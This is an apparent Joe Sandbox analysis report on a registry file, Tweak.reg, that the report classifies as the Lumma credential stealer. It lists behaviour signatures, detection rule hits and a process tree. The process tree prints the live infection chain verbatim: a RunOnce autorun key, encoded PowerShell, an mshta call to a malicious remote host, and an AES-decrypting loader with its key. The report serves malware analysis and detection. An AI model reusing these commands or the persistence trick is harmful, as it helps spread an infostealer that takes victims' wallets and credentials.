Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Tweak.reg

Overview

General Information

Sample name:Tweak.reg
Analysis ID:1486296
MD5:baffdb895190cb4ae0324818bf1847d6
SHA1:89f668869bec3065ba816d3e6ecbceddb43a2462
SHA256:28923f781c929115c6a1d8e776b020c1a27964f4a94a2a705910a56d7867465e
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Yara detected Powershell download and execute
Creates an autostart registry key pointing to binary in C:\Windows
Creates autostart registry keys with suspicious values (likely registry only malware)
Encrypted powershell cmdline option found
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Powershell drops PE file
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Suspicious MSHTA Child Process
Suspicious powershell command line found
Uses regedit.exe to modify the Windows registry
Very long command line found
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Powershell In Registry Run Keys
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • regedit.exe (PID: 6696 cmdline: "regedit.exe" "C:\Users\user\Desktop\Tweak.reg" MD5: 999A30979F6195BF562068639FFC4426)
  • powershell.exe (PID: 6908 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7176 cmdline: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7436 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 8072 cmdline: "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
  • svchost.exe (PID: 7284 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • powershell.exe (PID: 7728 cmdline: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • mshta.exe (PID: 7876 cmdline: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
      • powershell.exe (PID: 7956 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV = [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3) MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AutoIt3.exe (PID: 8128 cmdline: "C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x" MD5: 3F58A517F1F4796225137E7659AD2ADB)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 7436JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 7436INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
    • 0xcc4aa:$b1: ::WriteAllBytes(
    • 0xcd0a7:$b1: ::WriteAllBytes(
    • 0x1129c2:$b1: ::WriteAllBytes(
    • 0x113c68:$b1: ::WriteAllBytes(
    • 0xc9f7e:$s1: -join
    • 0x19a514:$s1: -join
    • 0x19b81a:$s1: -join
    • 0x20c40d:$s1: -join
    • 0x2194e2:$s1: -join
    • 0x21c8b4:$s1: -join
    • 0x21cf66:$s1: -join
    • 0x21ea57:$s1: -join
    • 0x220c5d:$s1: -join
    • 0x221484:$s1: -join
    • 0x221cf4:$s1: -join
    • 0x22242f:$s1: -join
    • 0x222461:$s1: -join
    • 0x2224a9:$s1: -join
    • 0x2224c8:$s1: -join
    • 0x222d18:$s1: -join
    • 0x222e94:$s1: -join
    Process Memory Space: powershell.exe PID: 7956JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7956INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x5a992:$b1: ::WriteAllBytes(
      • 0x5b2b3:$b1: ::WriteAllBytes(
      • 0x5bab5:$b1: ::WriteAllBytes(
      • 0x1c0033:$b1: ::WriteAllBytes(
      • 0x1c054e:$b1: ::WriteAllBytes(
      • 0x1c0f60:$b1: ::WriteAllBytes(
      • 0x1c186a:$b1: ::WriteAllBytes(
      • 0x2312db:$b1: ::WriteAllBytes(
      • 0x232583:$b1: ::WriteAllBytes(
      • 0x58089:$s1: -join
      • 0x94732:$s1: -join
      • 0x9f8a2:$s1: -join
      • 0x10c1d1:$s1: -join
      • 0x1192a6:$s1: -join
      • 0x11c678:$s1: -join
      • 0x11cd2a:$s1: -join
      • 0x11e81b:$s1: -join
      • 0x120a21:$s1: -join
      • 0x121248:$s1: -join
      • 0x121ab8:$s1: -join
      • 0x1221f3:$s1: -join

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_7436.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc85e:$b1: ::WriteAllBytes(
      • 0xc4d1:$s1: -join
      • 0x5c7d:$s4: +=
      • 0x5d3f:$s4: +=
      • 0x9f66:$s4: +=
      • 0xc083:$s4: +=
      • 0xc36d:$s4: +=
      • 0xc4b3:$s4: +=
      • 0x19de8:$s4: +=
      • 0x19eec:$s4: +=
      • 0x1d348:$s4: +=
      • 0x1da28:$s4: +=
      • 0x1dede:$s4: +=
      • 0x1df33:$s4: +=
      • 0x1e1a7:$s4: +=
      • 0x1e1d6:$s4: +=
      • 0x1e71e:$s4: +=
      • 0x1e74d:$s4: +=
      • 0x1e82c:$s4: +=
      • 0x20ac3:$s4: +=
      • 0x20e25:$s4: +=
      amsi64_7956.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0xc85e:$b1: ::WriteAllBytes(
      • 0xc4d1:$s1: -join
      • 0x5c7d:$s4: +=
      • 0x5d3f:$s4: +=
      • 0x9f66:$s4: +=
      • 0xc083:$s4: +=
      • 0xc36d:$s4: +=
      • 0xc4b3:$s4: +=
      • 0x19de8:$s4: +=
      • 0x19eec:$s4: +=
      • 0x1d348:$s4: +=
      • 0x1da28:$s4: +=
      • 0x1dede:$s4: +=
      • 0x1df33:$s4: +=
      • 0x1e1a7:$s4: +=
      • 0x1e1d6:$s4: +=
      • 0x1e71e:$s4: +=
      • 0x1e74d:$s4: +=
      • 0x1e82c:$s4: +=
      • 0x20ac3:$s4: +=
      • 0x20e25:$s4: +=

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Potentially Suspicious PowerShell Child Processes
      Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, CommandLine: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, CommandLine|base64offset|contains: , Image: C:\Windows\System32\mshta.exe, NewProcessName: C:\Windows\System32\mshta.exe, OriginalFileName: C:\Windows\System32\mshta.exe, ParentCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 6908, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck, ProcessId: 7176, ProcessName: mshta.exe
      Sigma detected: Suspicious MSHTA Child Process
      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVj
      Sigma detected: Change PowerShell Policies to an Insecure Level
      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split ($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD = [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object byte[] 16;$tcgVj
      Sigma detected: CurrentVersion Autorun Keys Modification
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: pOwErsHELl -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA, EventID: 13, EventType: SetValue, Image: C:\Windows\regedit.exe, ProcessId: 6696, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\MegaLIMLauncher
